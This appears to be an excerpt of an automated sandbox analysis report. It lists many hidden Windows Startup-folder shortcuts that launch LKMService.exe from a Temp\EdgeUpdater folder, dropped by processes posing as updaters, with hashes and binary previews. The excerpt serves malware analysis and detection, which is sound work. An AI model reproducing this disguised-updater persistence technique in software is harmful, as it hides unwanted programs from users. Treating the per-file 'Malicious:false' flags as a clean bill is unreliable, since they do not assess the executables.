                                                                                                                                                                                                                                          SSDEEP:24:8wWCsDYlXPXv+RhgK3xj/jiSAzav/42eEFsuqygm:8wFsDYlf2RNx7sevgosryg
                                                                                                                                                                                                                                          MD5:B01F29B686E4B559800AE7D34D3AAF1A
                                                                                                                                                                                                                                          SHA1:6339D858948AFCE2E1B3FC88A337E6E5730911E2
                                                                                                                                                                                                                                          SHA-256:E3F74BDE9565AFAD9D02EEA1F3146A1CC6FB84549F75F7D57E617DCBC9DD11DD
                                                                                                                                                                                                                                          SHA-512:1789D8BFA35391762507982A4BAE6C6B80300B02062E6A900BA51A9722A59554773EABB6D09A6E95978DA6AEE01C44EB59D0BAD79BB19F5D0ECE6D51F8372F03
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......%...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^.........................T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_19de10f190114ebcae0b8dcf51d2111a.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:42 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.956840821753138
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8hsDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8hsDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:0873FE183ACE48AB877F92199F021F9C
                                                                                                                                                                                                                                          SHA1:B429A48ED928926D43A59EC9C031D563D9A4247A
                                                                                                                                                                                                                                          SHA-256:8761F90F97002955F8FE25E047F90DC7C893E0384145EABCE1B2AC1E9B4EAB20
                                                                                                                                                                                                                                          SHA-512:193E6D4802CE9DC2802DB7BCE7918843DEA9F29068F4E0EC0552AC1B50D4902222AC964AF6D6448E264AA92A7CFA80D5D9D45721FB4358535FB6AB29A16B6368
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1a285354ff3547a5b61dbb65109a408b.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:34 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.961468659446138
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8sSDYlXPXv+RvgKWnj/jiSAzav/42eEFsuqygm:8sSDYlf2R2n7sevgosryg
                                                                                                                                                                                                                                          MD5:EEBC6E5DFE37DDB0086BDC24C8115E99
                                                                                                                                                                                                                                          SHA1:061CB80CEDF91EB10038AE4FF8BE84EE579046B4
                                                                                                                                                                                                                                          SHA-256:D709F26336BAB2EBA1D7E14E591347920CC1CC98AF8587F22B2021C70B2FC094
                                                                                                                                                                                                                                          SHA-512:9A5019879DC87136387A7A17AE08CFEE0B436610907384040BF7F7653111B6A8741430D3D162DE44B545DB04BB10138AA66AA8EEC4EC4BEEDE23711FC7177603
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M..................t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^......................([.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1a522d1817c644eaa1a640b7dd1d131c.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:04 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.941847410233924
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8r7cDYlXPXv+RBHgK2j/jiSAzav/42eEFsuqygm:8roDYlf2Rw7sevgosryg
                                                                                                                                                                                                                                          MD5:794EE5F6DC4EFD33BC3C125C5D391FD0
                                                                                                                                                                                                                                          SHA1:D19659C1CB8BC10EB59EB82D79E022AC330C6864
                                                                                                                                                                                                                                          SHA-256:F768B4B8DE4648D02C38FD3747FA20F1B43D27B855FD138E270FF5B1C240A97F
                                                                                                                                                                                                                                          SHA-512:2EFC6251B5A5C53D21A65476869914E9084B75A24ADBAABB52EC6AA0B518420AE55E133904019AF0E2FB48BAFE2700122FA7BDEFF85E9D8F5F3CB6A993C50C01
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......?................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYce..Temp..:......EW<2BYce....^......................PC.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1acaba343b364a7db82c6833895dd99b.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:51 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.95708534536884
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8tsDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8tsDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:CAD8E45F997C61D973760484C0B83ED1
                                                                                                                                                                                                                                          SHA1:C0FC224068400822634C67348574782E4EF069B7
                                                                                                                                                                                                                                          SHA-256:46745166E0EBA1F3D8E38A73FF1904BAA42BC8B6A3DDC4E0B1DB9C7AFB938C83
                                                                                                                                                                                                                                          SHA-512:6AA17D2769DBBF41CDE67D37479E7EDF1F291E9D61CB6C232DC6B511C9A1AA2642C2D6AE8C57657442CE080DA8956C112F64C22A909934C5DE90697085B0EB84
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......Qo...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1f7c1c49e34e415cab27193ab44807e0.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:42:45 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.936303303050008
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8Y7cDYlXPXv+RIgKe9sjiSAzav/42eEFsuqygm:8YoDYlf2Rhssevgosryg
                                                                                                                                                                                                                                          MD5:39321DFCE7AC456D68F04BDBCD19E1B8
                                                                                                                                                                                                                                          SHA1:4C851B66447238BC984030B5EAA9F93D6DD82FC8
                                                                                                                                                                                                                                          SHA-256:75D62572229B6184986678BC3B146BC76CD1C94FCA432CA42C972A6BA05AC1FF
                                                                                                                                                                                                                                          SHA-512:302E51B8E246DAC7C2ED710C86AB3DD8A30C2DC8B1AD3E2BF4B4B45416CD2D8E3DDF989874DCAFC712028575DC2AD3AE49F5968DB93A6FE9F7127B261FFA5376
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......|>q..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYVe..Temp..:......EW<2BYVe....^........................T.e.m.p.....`.1.....BYVe..EDGEUP~1..H......BYVeBYVe............................5.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1fdad6c98be145cabd91792daf54ee49.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:22 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.9617334639918145
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:84sDYlXPXv+RrGgKoj/jiSAzav/42eEFsuqygm:84sDYlf2RZ7sevgosryg
                                                                                                                                                                                                                                          MD5:EA79E09FA968AD9370923112FD1EEF06
                                                                                                                                                                                                                                          SHA1:8ECD08D6B7DE3CE3236237ABA811E74C521F87D0
                                                                                                                                                                                                                                          SHA-256:3C309E377F1FB80AB69B4960C9A4DA89A15F1C29210D1D0B853FCD686627F14B
                                                                                                                                                                                                                                          SHA-512:8D0D3C2604AC659471045688788B8447C887101989CE360D3883563837DF1A6620BDB09E5C25B9A21686B31F9E4EF4C7B6A29ABA1DE0F684B34FC7A2F311F5AF
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......n...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^......................Y/.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2234a4242580420787d55bfd4dcf2a4c.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:12 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.948296065616986
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8hxbi7cDYlXPXv+RBgKxj/jiSAzav/42eEFsuqygm:8hxbioDYlf2R37sevgosryg
                                                                                                                                                                                                                                          MD5:03957923E76E961222B165A79BAE2A57
                                                                                                                                                                                                                                          SHA1:AF84390B4145DE3CB13164DD0FD7688EC7817F3C
                                                                                                                                                                                                                                          SHA-256:2745642C629BC61FBB8AED97C4E39E9D213137590ECC9A3414BF74D0F42055F6
                                                                                                                                                                                                                                          SHA-512:2AEC168FA728163A2CDBA746656D937471BFB8982321A89973ADE6A967E04BC05DD824B49E8431E374C4C39ADE9BA2259B1C2E264E8AC1342AC14C7DA19BEA50
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......s..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYge..Temp..:......EW<2BYge....^.....................24..T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2248f20f044f4c4cbee8f92a4524a738.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:42:47 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.940541991972275
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8R7cDYlXPXv+RIgKef2jiSAzav/42eEFsuqygm:8RoDYlf2Rb2sevgosryg
                                                                                                                                                                                                                                          MD5:812BE2755E88C784A834A6C72461D66B
                                                                                                                                                                                                                                          SHA1:F5A9F0531411C895DF3068C4E826937307763491
                                                                                                                                                                                                                                          SHA-256:EE451CDC2E35B562AD64E775DB8EFFB4F0664ED58FA0BBDD08319D5BCC303EE5
                                                                                                                                                                                                                                          SHA-512:45752321EC8F075F463F8F4016188905C0357AE98225419463F0063A3B7BA36E4F8B5EC9EED6AF9D9B5A227A6029572A3F4C3E4F9FC4A76EA9EB3103C5942AA7
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYVe..Temp..:......EW<2BYVe....^........................T.e.m.p.....`.1.....BYXe..EDGEUP~1..H......BYVeBYXe..........................w([.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_23ad112211624e9bbf89add5fabfa281.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:38 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.955192542274998
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8LsDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8LsDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:A518CE8DC5721CC42F2E5A2697946EBE
                                                                                                                                                                                                                                          SHA1:010EDC77B712591CAE97361DC902BA2B9678945C
                                                                                                                                                                                                                                          SHA-256:B310DA049C63639A6BB1C4A7A48EE42F099417377A041E9A96C7F952EC68FA17
                                                                                                                                                                                                                                          SHA-512:6CD348D67D5F60B6B74316DA5072D374B503F9857FF8ECFF85035408E81BB0C96F6B94130F416DE80DBEE09DA9662105FD1B1DF410126755A941B89605EF177E
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......D{...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_23f2539bf87b4472935fcbb98ee0933e.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:11 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.95387644563414
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:81isDYlXPXv+RYgKoj/jiSAzav/42eEFsuqygm:81isDYlf2Rb7sevgosryg
                                                                                                                                                                                                                                          MD5:AF1A41EB6E465125994BA03176E273B6
                                                                                                                                                                                                                                          SHA1:063663782FBEEBAC510AEB2899E2DF26E3A95ADA
                                                                                                                                                                                                                                          SHA-256:9C60D52BBE247DD525E6AD3D49EA11F64467A660D9041903D7C7CF9D4997E53B
                                                                                                                                                                                                                                          SHA-512:78EBEE56676D41A7B7207663EF7BFAD87EAB7CCFEF21C16CF3E36F2A32EDF7C7A86768EED19EE4DF49D78DE6EF11A9F4AFE75D1DDC6ABE213F3D8080684CD268
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......Mh...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^.......................!.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_243760fb74354fe5804142083c1a038e.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:52 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.956414695973111
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:89sDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:89sDYlf2Rf7sevgosryg
